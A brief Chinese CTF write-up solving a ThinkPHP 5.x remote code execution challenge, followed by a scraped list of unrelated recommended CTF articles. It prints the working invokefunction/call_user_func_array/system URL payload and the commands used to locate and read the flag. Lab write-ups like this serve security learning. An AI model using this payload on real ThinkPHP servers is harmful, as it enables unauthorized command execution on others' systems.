题目场景: http://220.249.52.133:52904 (温馨提示:每次进入URL的端口号都不一样)

1、点击链接进入如下界面

2、百度搜索:Thinkphp V5.x 远程代码执行漏洞-POC


https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

3、把“/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l”加在后面,然后URL为:http://220.249.52.133:52904/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

4、s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir


5、dir—>find / -name “*flag”


5.1 回车


6、find / -name “*flag”—>cat /flag—>回车

7、OK

flag{thinkphp5_rce}

CTF unserialize3相关推荐

  1. [CTF/网络安全]攻防世界unserialize3解题详析及php序列化反序列化实例讲解

    [CTF/网络安全]攻防世界unserialize3解题详析及php序列化反序列化实例讲解 _wakeup()及php序列化反序列化 序列化字符串结构分析 _wakeup()的利用 解题思路 伪属性数 ...

  2. 【CTF】实验吧 困在栅栏里的凯撒

    题目先提到栅栏,再提到凯撒,按照顺序先栅栏解码,再凯撒解码. 一般密码的开头不是flag就是key或者ctf 所以选择"6栏",在进行凯撒解码 在所有组合中,发现CTF即为flag

  3. 【CTF】实验吧 古典密码

    一共是35个字符分成5*7或者7*5 最终选择5行7列 首先变动第一行的位置,然后根据第一行变动的位置,依次变动下面的行 OCU{CFT ELXOUYD ECTNGAH OHRNFIE NM}IOTA ...

  4. 【CTF】实验吧 围在栅栏中的爱

    对摩斯密码进行解码:kiqlwtfcqgnsoo QWE是键盘上的前三个,ABC是26个字母的前三个.所以,二者有这样的对应关系. #include <stdio.h> #include ...

  5. 【CTF】实验吧 奇怪的短信

    和实验吧 The Flash-14有些类似,总共的数字数目是偶数,所以两两分开,题干中的"短信"是提示,观察两两分组的第二个数字没有超过四的,可以想到手机上的九键 例如第一组数:3 ...

  6. 【CTF】实验吧 The Flash-14

    标题的提示是:闪电侠的第十四集用到的加密方式(看来写CTF题要无所不知,不然咋能想到是一部剧) 根据两两一组将数据分类 54  43  32  52  22  44  55  34  22  51  ...

  7. 【CTF】实验吧 传统知识+古典密码

    对照顺序写下: 根据对应的干支得到 28 30 23 8 17 10 16 30   +甲子 所有的数加60 得到 88 90 83 68 77 70 76 90 找到ASCII码对照表可得到XZSD ...

  8. php upload ctf,强网杯CTF防御赛ez_upload Writeup

    这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家. ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型 ...

  9. ctf 文件头crc错误_[CTF隐写]png中CRC检验错误的分析

    [CTF隐写]png中CRC检验错误的分析 最近接连碰到了3道关于png中CRC检验错误的隐写题,查阅了相关资料后学到了不少姿势,在这里做一个总结 题目来源: bugku-MISC-隐写2 bugku ...

  10. 所见所得php网页,Pwnium CTF之所见所得所想

    [TSRC编者按] 腾讯安全中心的年轻小伙伴们早就眼馋上次的BCTF比赛了,但是由于时间关系未能参加,十分遗憾.听说pwnium CTF比赛要开始了,于是他们摩拳擦掌,跃跃欲试.这不,他们牛刀小试,在 ...

最新文章

  1. 高桥盾react和boost_boost与react的战斗
  2. 帮助推动Java EE向前发展
  3. linux下搭建nagios监控
  4. webserver 交互方式说明
  5. linux ssh和scp实例
  6. Linux系统原理(工作模式)
  7. 用 GitHub 来部署静态网页 ꒰・◡・๑꒱
  8. Office编程-RPC服务器不可用
  9. 天线多频设计方法精讲
  10. Junit 4 的使用
  11. 《微电子概论》 PN结与二极管
  12. 达芬奇导入gif(含 AE 和 PR)
  13. H3C交换机console口Xshell连接
  14. JAVA/JS针对常见的字符数据处理的一个总结(JS截取字符串,判断是否包含某个字符串及它出现的次数;JAVA数据四舍五入,去掉科学计数法,截取特定符号之前或之后的数据)
  15. linux 显卡 1050ti,MAX-Q终于出中端卡了 GTX1050Ti MAX-Q显卡曝光
  16. yd什么意思_excel中yd是什么意思
  17. 手机开热点如何查看接入热点的所有ip
  18. html设置背景图片高度,如何使用CSS设置背景图像的大小?
  19. AcWing 4783. 多米诺骨牌
  20. python制作刮刮乐惊喜揭秘呀~【趣味代码】

热门文章

  1. 企业宣传软文怎么写?手把手教大家撰写企业宣传软文
  2. vue下个人实现拼图验证码
  3. Windows 安全补丁
  4. Python爬虫网页元素定位术,就在这篇博客中
  5. 【MySQL 09】安装mysql时出现:需要这两个包perl(Data::Dumper),perl(JSON)
  6. 《产品前线:48位一线互联网产品经理的智慧与实战》读书笔记3
  7. TBODY标签的作用介绍
  8. [iOS]寻找superView
  9. 嵌入式Linux资源网站,嵌入式Linux名词及资源
  10. 物联网如何测试(一)